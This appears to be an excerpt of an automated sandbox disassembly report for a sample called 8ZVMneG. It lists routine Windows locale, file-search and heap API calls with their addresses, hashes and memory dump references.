                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                  • Opcode ID: 64c62baf0cfab19bce6d3eebbfb457ed73aa01995c7c989b9b0d2ea588aaa978
                                                                                                                                                                                                                                                                  • Instruction ID: 99da01a5db7a2686a5ba254b12b2488b4171d3a154a1ba643dd3751113177afb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64c62baf0cfab19bce6d3eebbfb457ed73aa01995c7c989b9b0d2ea588aaa978
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B16C31210648DFDB19CF29C486BA57BE0FF45368F299658E8DADF2A1C375E981CB40
                                                                                                                                                                                                                                                                  Function 00ECB2B8 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00ECB2CE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e04d2fb04b7ac6a97f566e54de7b3e26342c43b662735b2d4e9d2e890bf5b9d
                                                                                                                                                                                                                                                                  • Instruction ID: 0d52ab1c0cf7ab7af11b1b1df8f7499d5cb6330a32a854142f7a0867e221eb50
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e04d2fb04b7ac6a97f566e54de7b3e26342c43b662735b2d4e9d2e890bf5b9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4A1BEB1A002458FCB1CCF6AD9827AABBF1FB88314F24912ED501FB260D3359949CF60
                                                                                                                                                                                                                                                                  Function 00EDD2A7 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED8700: RtlAllocateHeap.NTDLL(00000008,?,?,?,00ED7620,00000001,00000364,?,00000006,000000FF,?,00ED126E,00EF1540,0000000C), ref: 00ED8741
                                                                                                                                                                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EDD448
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EDD53C
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EDD57B
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EDD5AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4087847297-0
                                                                                                                                                                                                                                                                  • Opcode ID: 72c7f9458ca791077bcd231eb5cddbd208e9c1c1d61d7d8aacb10d4535ae7593
                                                                                                                                                                                                                                                                  • Instruction ID: 7098493fc05244b34fa25be677dc979f87b7ed0675afac0195dbec6fb918cfe6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72c7f9458ca791077bcd231eb5cddbd208e9c1c1d61d7d8aacb10d4535ae7593
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98515771908118AFDB14AF289C84AFEB7B9DF85318F14619FF418B3301EA308E438B61
                                                                                                                                                                                                                                                                  Function 00EDCBAF Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDCC03
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e998960e170347be48c0ddf13e1ff5f23c9fc4660c039048e276b6fd332f141
                                                                                                                                                                                                                                                                  • Instruction ID: 318e81902e2542e44a081080fc803534fbb340c1ff13322b9103a6aa74885269
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e998960e170347be48c0ddf13e1ff5f23c9fc4660c039048e276b6fd332f141
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C21D671524207ABDB289B15DD41ABBB3E8EF04744B20207BFE05F6241EB35DD42C750
                                                                                                                                                                                                                                                                  Function 00ECFF5A Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 324384977efa3fe03bc06758107ca0eb534c9d62713c87481bcabb05ab344196
                                                                                                                                                                                                                                                                  • Instruction ID: 47792c27347aab13bae867ceeeb66f84f2af3cac2c1818757839416ff81eb502
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 324384977efa3fe03bc06758107ca0eb534c9d62713c87481bcabb05ab344196
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDC1CF305016469ECB29CF68C584BBAB7B1EF06308F1C6A1FD496B77A2C371A947CB51
                                                                                                                                                                                                                                                                  Function 00EDC862 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00EDC8FD,00000001,00000000,?,-00000050,?,00EDC6ED,00000000,-00000002,00000000,?,00000055,?), ref: 00EDC8D4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9ac98a42ce49779f78da8eb0d2ec4a812128c5d17fb72612323aa2774b1ce996
                                                                                                                                                                                                                                                                  • Instruction ID: ca47eece97dd83f3eb15d1d1cba86015d6dba2eebab6768d3ecc86d319a4740f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ac98a42ce49779f78da8eb0d2ec4a812128c5d17fb72612323aa2774b1ce996
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E411063A6043065FDB1C9F39C8919BAB792FB84398B24442EE94667740E771B943D740
                                                                                                                                                                                                                                                                  Function 00EDCCCF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDCD23
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                  • Opcode ID: a574e9f2d67325912a22463e5c835d140495c0b818b70b15491a42cb959e0786
                                                                                                                                                                                                                                                                  • Instruction ID: b6f199c5530a897f9820158171b34ffffb579d94d539331edffc4ca2da2e2cc0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a574e9f2d67325912a22463e5c835d140495c0b818b70b15491a42cb959e0786
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF11C672510217ABDB18AB28DC42ABB77E8EF05354B20517BF901F7241EB74ED06C790
                                                                                                                                                                                                                                                                  Function 00EDCE7C Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EDCB19,00000000,00000000,?), ref: 00EDCEA8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                  • Opcode ID: bcbf63593a999cf8966abd2a0e1421639a23fbd9be925a8724c782eeadbdc0a7
                                                                                                                                                                                                                                                                  • Instruction ID: 8c815091e0a3042c4207f683b765ba40bead47743d308977a6b185fbff568694
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcbf63593a999cf8966abd2a0e1421639a23fbd9be925a8724c782eeadbdc0a7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D01A772604117AFDB28976488456FE379CDB403D8F25442AAC02F7280EA70EE42C6D4
                                                                                                                                                                                                                                                                  Function 00EDCB50 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00EDCBAF,00000001,?,?,-00000050,?,00EDC6B5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00EDCB9A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                  • Opcode ID: c5940c60a0eae67596e287487180d9f30ccb03c898d73e11ccb2c1d5d439afa3
                                                                                                                                                                                                                                                                  • Instruction ID: 3ea9bd9c035f579095527802b8c79d6a2f723a77dff2fc73346aab45ac843366
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5940c60a0eae67596e287487180d9f30ccb03c898d73e11ccb2c1d5d439afa3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6F0C8362043055FDB145F35D886A767BD1EB807A8B25542FF9459B740D6B1DC03C650
                                                                                                                                                                                                                                                                  Function 00ED8610 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED3EA8: EnterCriticalSection.KERNEL32(?,?,00ED7A60,?,00EF1970,00000008,00ED7952,?,?,?), ref: 00ED3EB7
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00ED8603,00000001,00EF19F0,0000000C,00ED7F68,-00000050), ref: 00ED8648
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                  • Opcode ID: dcd62104b88a1a852100f14f5c4b45210dbc1c7bc8c3075f8b98ddf9950d1cd9
                                                                                                                                                                                                                                                                  • Instruction ID: 4088af35fdf1460caeff33186ea68b9c7444402e0d515ce027a6f9faa3479d42
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcd62104b88a1a852100f14f5c4b45210dbc1c7bc8c3075f8b98ddf9950d1cd9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F03772A01204EFD714EF98E902BAA77F0EB84B21F00512AE810AB2E1CB758945CB81
                                                                                                                                                                                                                                                                  Function 00EDCC84 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00EDCCCF,00000001,?,?,?,00EDC70F,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00EDCCBB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1983d1d9410e896fa89ac3be0e154b7f555ffbecfb4bc097307ff1b77fb8d6fe
                                                                                                                                                                                                                                                                  • Instruction ID: d1a503d78fb9a2e176d5cfd1dbde61903e7995e54a9a12fd7168c09802629c66
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1983d1d9410e896fa89ac3be0e154b7f555ffbecfb4bc097307ff1b77fb8d6fe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0553630020657CB08AF36D84566ABF90EFC1794B1A405AEB0A9B340C6729843C790
                                                                                                                                                                                                                                                                  Function 00ED806C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00ED2C04,?,20001004,00000000,00000002,?,?,00ED1B16), ref: 00ED80A0
                                                                                                                                                                                                                                                                  Memory Dump Source
